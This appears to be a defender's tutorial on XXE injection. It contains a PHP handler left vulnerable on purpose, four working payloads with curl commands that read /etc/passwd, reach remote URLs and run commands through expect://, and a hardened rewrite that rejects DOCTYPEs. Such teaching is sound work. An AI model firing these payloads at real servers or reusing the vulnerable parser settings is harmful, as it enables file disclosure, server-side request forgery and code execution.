Defender's Notes

XXE

Last updated 4 years ago

What is it?

XML External Entity (XXE) injection targets systems that parse XML input, whether it arrives through a file upload or another channel. The crafted XML abuses a SYSTEM entity declaration and can be used to attack a web application. Resulting attacks include denial of service, local file disclosure, remote code execution, and more.

Extensible Markup Language (XML) was designed for desktop publishing and is now widely used for data exchange. It is a markup language similar to HTML; both derive from SGML, which was based on IBM's GML from the 1960s. XML is typically used instead of HTML when data must be sent from one application to another (data interchange).

Exploitation

XXE flaws are a form of injection attack. XML parsers support "external entities" by default. Abusing an XXE flaw lets a malicious document turn the XML parser into a proxy that serves local or remote content (external-entity vulnerabilities are similar in effect to LFI/RFI), and in some configurations this leads to RCE.

Types of XXE attacks

  • Exploiting XXE to retrieve files: an external entity is defined containing the contents of a file, and that content is returned in the application's response.
  • Exploiting XXE to perform SSRF attacks: an external entity is defined based on a URL to a back-end system.
  • Exploiting blind XXE to exfiltrate data out-of-band: sensitive data is transmitted from the application server to a system that the attacker controls.
  • Exploiting blind XXE to retrieve data via error messages: the attacker triggers a parsing error message containing sensitive data.

SSRF via XXE

SSRF is related to CSRF. CSRF: a forged request originating from a client. SSRF: a forged request originating from the server. In the XXE case, an external entity whose SYSTEM identifier points at a back-end URL makes the server issue that request on the attacker's behalf.

Example PoC

Assume we have access to the server-side scripts. Below is the vulnerable server-side PHP script running at /book.php; viewing the page's HTML source will not reveal this code.

<?php
// Vulnerable on purpose: LIBXML_NOENT substitutes entity references and
// LIBXML_DTDLOAD loads external DTDs, so a SYSTEM entity in the submitted XML
// is resolved by the parser and its content ends up in the response below.
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$xml = simplexml_import_dom($dom);
$author = $xml->author;
$title = $xml->title;
$date = $xml->publish_date;

echo "Thank you for your file submission!<br>";
echo "Your entry: <br>";
echo "Author: " . $author . "<br>";
echo "Title: " . $title . "<br>";
echo "Date: " . $date . "<br>";
?>

The PHP page above reads the author, title, and publish_date elements from the submitted XML and echoes them back, so the payloads below place the entity reference in the author field.

PoC 1 - Testing payload (xxe.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "TEST" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload the file via the site's file upload, or use curl to send the payload
curl -d@/home/test/xxe.xml http://test.com/book.php
# On browser route to http:

PoC 2 (LFI) - Display Local File (xxe2.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload the file via the site's file upload, or use curl to send the payload
curl -d@/home/test/xxe2.xml http://test.com/book.php

PoC 3 (RFI) - Access URL (xxe3.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://google.com/robots.txt" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload the file via the site's file upload, or use curl to send the payload
curl -d@/home/test/xxe3.xml http://test.com/book.php

PoC 4 (RCE) - Remote Code Execution via php (xxe4.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload the file via the site's file upload, or use curl to send the payload
curl -d@/home/test/xxe4.xml http://test.com/book.php
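All four PoCs above succeed only because /book.php passes LIBXML_NOENT | LIBXML_DTDLOAD to loadXML. As an added example that is not part of the original page, here is a hardened rewrite of that handler: it parses with libxml's default flags plus LIBXML_NONET, rejects any document that carries a DOCTYPE (the check the OWASP XXE Prevention Cheat Sheet recommends for PHP), fails closed on parse errors, and escapes output. The 64 KiB size limit is an assumed value.

```php
<?php
// Hardened /book.php (added example, not the page's original code): default
// libxml flags, no network, DOCTYPE rejected, fail closed, output escaped.
$xmlfile = file_get_contents('php://input');

// Fail closed on empty or oversized input (64 KiB limit is an assumed value).
if ($xmlfile === false || $xmlfile === '' || strlen($xmlfile) > 65536) {
    http_response_code(400);
    exit('Invalid submission');
}
// PHP < 8.0 still loads external entities unless disabled explicitly.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

$dom = new DOMDocument();
// Keep libxml errors internal so parser diagnostics are not echoed to the client.
$prevUseErrors = libxml_use_internal_errors(true);
// No LIBXML_NOENT and no LIBXML_DTDLOAD: entities are not substituted and
// external DTDs are not fetched. LIBXML_NONET forbids any network access.
$loaded = $dom->loadXML($xmlfile, LIBXML_NONET);
libxml_clear_errors();
libxml_use_internal_errors($prevUseErrors);
if ($loaded === false) {
    http_response_code(400);
    exit('Malformed XML');
}

// Reject any DOCTYPE; without one, no <!ENTITY> declaration can exist at all.
foreach ($dom->childNodes as $child) {
    if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
        http_response_code(400);
        exit('DOCTYPE is not allowed');
    }
}

$xml = simplexml_import_dom($dom);
$author = (string) $xml->author;
$title  = (string) $xml->title;
$date   = (string) $xml->publish_date;

// Escape before echoing so a submitted value cannot inject HTML into the page.
$h = static fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
echo "Thank you for your file submission!<br>";
echo "Your entry: <br>";
echo "Author: " . $h($author) . "<br>";
echo "Title: " . $h($title) . "<br>";
echo "Date: " . $h($date) . "<br>";
```

Sending xxe.xml through xxe4.xml to this version yields a 400 response at the DOCTYPE check, and an undeclared &xxe; reference is already rejected as a parse error before that.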

Sample payload

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

Payloads

Cheat sheet

Other Resources

References

  • Good resource for payloads: https://github.com/payloadbox/xxe-injection-payload-list
  • OWASP XML External Entity Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
  • OWASP's XML External Entity (XXE) Processing: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
  • Blind XXE: https://portswigger.net/web-security/xxe/blind
  • Exploiting XXE with local DTD files: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
  • From blind XXE to root-level file read access: https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/